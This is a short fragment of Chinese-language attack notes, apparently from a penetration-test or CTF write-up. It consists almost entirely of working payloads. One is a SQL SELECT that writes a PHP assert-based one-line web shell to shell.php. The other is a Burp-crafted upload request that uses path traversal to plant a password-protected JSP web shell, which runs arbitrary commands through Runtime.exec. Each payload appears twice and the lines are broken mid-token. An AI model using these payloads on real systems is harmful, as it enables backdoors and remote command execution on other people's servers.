执行sql语句后 就会把记录保存在shell.php 里
SELECT '<?php @assert($_REQUEST["123"]);?>';
SELECT '<?php @assert($_REQUEST["123"]);?>';
burp抓包 构造
payload file_path=&dirs=%2F&res_path=res&file_name=../../static/jsp_shell.
jsp&file_content=%3C%25%0A+++
+if(%22p0desta%22.equals(request.getParameter(%22pwd%22)))%7B%0A++
++++++java.io.InputStream+in+
%3D+Runtime.getRuntime().exec(request.getParameter(%22i%22)).getIn
putStream()%3B%0A++++++++int+a+%3D+-1%3B%0A++++++++byte%5B%5D+b+
%3D+new+byte%5B2048%5D%3B%0A+++++++
+out.print(%22%3Cpre%3E%22)%3B%0A+++++++
+while((a%3Din.read(b))!%3D-1)%7B%0A+++++++++++
+out.println(new+String(b))%3B%0A++++++++%7D%0A+++++++
+out.print(%22%3C%2Fpre%3E%22)%3B%0A++++%7D%0A%25%3E
payload file_path=&dirs=%2F&res_path=res&file_name=../../static/jsp_shell.
jsp&file_content=%3C%25%0A+++
+if(%22p0desta%22.equals(request.getParameter(%22pwd%22)))%7B%0A++
++++++java.io.InputStream+in+
%3D+Runtime.getRuntime().exec(request.getParameter(%22i%22)).getIn
putStream()%3B%0A++++++++int+a+%3D+-1%3B%0A++++++++byte%5B%5D+b+
%3D+new+byte%5B2048%5D%3B%0A+++++++
+out.print(%22%3Cpre%3E%22)%3B%0A+++++++
+while((a%3Din.read(b))!%3D-1)%7B%0A+++++++++++
+out.println(new+String(b))%3B%0A++++++++%7D%0A+++++++
+out.print(%22%3C%2Fpre%3E%22)%3B%0A++++%7D%0A%25%3E